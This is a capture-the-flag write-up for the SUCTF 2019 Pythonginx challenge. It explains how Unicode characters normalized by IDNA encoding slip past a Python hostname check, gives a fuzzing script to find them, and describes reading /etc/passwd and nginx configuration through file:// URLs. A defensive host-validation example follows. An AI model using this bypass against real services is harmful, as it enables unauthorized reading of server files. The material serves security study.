Challenge link: https://buuoj.cn/challenges#[SUCTF%202019]Pythonginx
![](https://img.haomeiwen.com/i12067578/912c42b406b0c62b.png)
Opening the challenge shows the source code.
![](https://img.haomeiwen.com/i12067578/3df806e92fba8c9c.png)
The trick here is that Python's urllib.parse urlunsplit() function turns odd-looking characters (ⓒ ℂ ℭ) into an ordinary C.
![](https://img.haomeiwen.com/i12067578/120cd53ec06f90bd.png)
As for how to find these odd-looking C characters:

```python
from urllib import parse
from urllib.parse import urlsplit, urlunsplit


def fuzzing():
    # Try every code point in the Basic Multilingual Plane as the last character
    for i in range(65536):
        uni = chr(i)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str:" + uni + " unicode: \\u" + str(hex(i))[2:])
                return  # stop at the first hit
        except Exception:
            # Characters that break URL parsing or IDNA encoding are skipped
            pass


def getUrl(url):
    # First check: hostname as seen by urlparse
    host = parse.urlparse(url).hostname
    print(host)
    if host == 'suctf.cc':
        return False
    # Second check: netloc as seen by urlsplit
    parts = list(urlsplit(url))
    host = parts[1]
    print(host)
    if host == 'suctf.cc':
        return False
    # Each label is IDNA-encoded before the URL is rebuilt
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # Drop everything after the first space in the URL
    finalUrl = urlunsplit(parts).split(' ')[0]
    print(finalUrl)
    host = parse.urlparse(finalUrl).hostname
    print(host)
    if host == 'suctf.cc':
        return True
    else:
        return False


fuzzing()
```
Then use the file:// protocol to try reading etc/passwd.
![](https://img.haomeiwen.com/i12067578/ab2c1f1a21695ca3.png)
![](https://img.haomeiwen.com/i12067578/bc1f1760d3e22f45.png)
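However, reading flag or flag.txt from the root directory does not work; no such file exists.
But the challenge mentions nginx, so look at the nginx configuration file,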
![](https://img.haomeiwen.com/i12067578/9a19e71b801cac52.png)
![](https://img.haomeiwen.com/i12067578/355166e8e9294055.png)
![](https://img.haomeiwen.com/i12067578/6e1a30539a9aa88a.png)
and that is where the flag is found.
For example, F
![](https://img.haomeiwen.com/i12067578/e60a286fa4fd4655.png)
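The same behaviour from the defending side, as an added example that is not part of the original write-up or the challenge code: a host check that compares the hostname only after the per-label `encode('idna')` step used in the script above, and that restricts schemes so `file://` is refused. The function names, the scheme allow-list and the sample URLs are assumptions made for illustration.

```python
from urllib.parse import urlsplit

BLOCKED_HOSTS = {"suctf.cc"}         # host the challenge code refuses
ALLOWED_SCHEMES = {"http", "https"}  # assumption: the fetcher only needs web URLs


def naive_is_blocked(url):
    """Compare the raw hostname only, as the first checks in the script above do."""
    return urlsplit(url).hostname in BLOCKED_HOSTS


def canonical_host(url):
    """Return the hostname as it looks after the per-label IDNA step."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError("URL has no hostname")
    labels = host.rstrip(".").split(".")
    if any(label == "" for label in labels):
        raise ValueError("empty label in hostname")
    # encode('idna') applies nameprep (NFKC plus case folding), the step that
    # turns U+2102, U+212D or U+24D2 into a plain ASCII 'c'.
    return ".".join(l.encode("idna").decode("ascii") for l in labels).lower()


def is_url_allowed(url):
    """Decide on the canonical form; reject anything that cannot be parsed."""
    try:
        if urlsplit(url).scheme not in ALLOWED_SCHEMES:
            return False
        return canonical_host(url) not in BLOCKED_HOSTS
    except (ValueError, UnicodeError):
        return False  # fail closed


# Constructed sample URLs, not taken from the challenge server.
SAMPLES = [
    "http://suctf.cc/",
    "http://suctf.c\u2102/",
    "http://suctf.c\u24d2/",
    "http://example.org/",
    "file:///tmp/example",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(ascii(u), "naive_blocked=%s" % naive_is_blocked(u),
              "allowed=%s" % is_url_allowed(u))
```

The point of the comparison is that the check and the later request must see the same string: validate the canonical hostname and then fetch that canonical URL, not the original input.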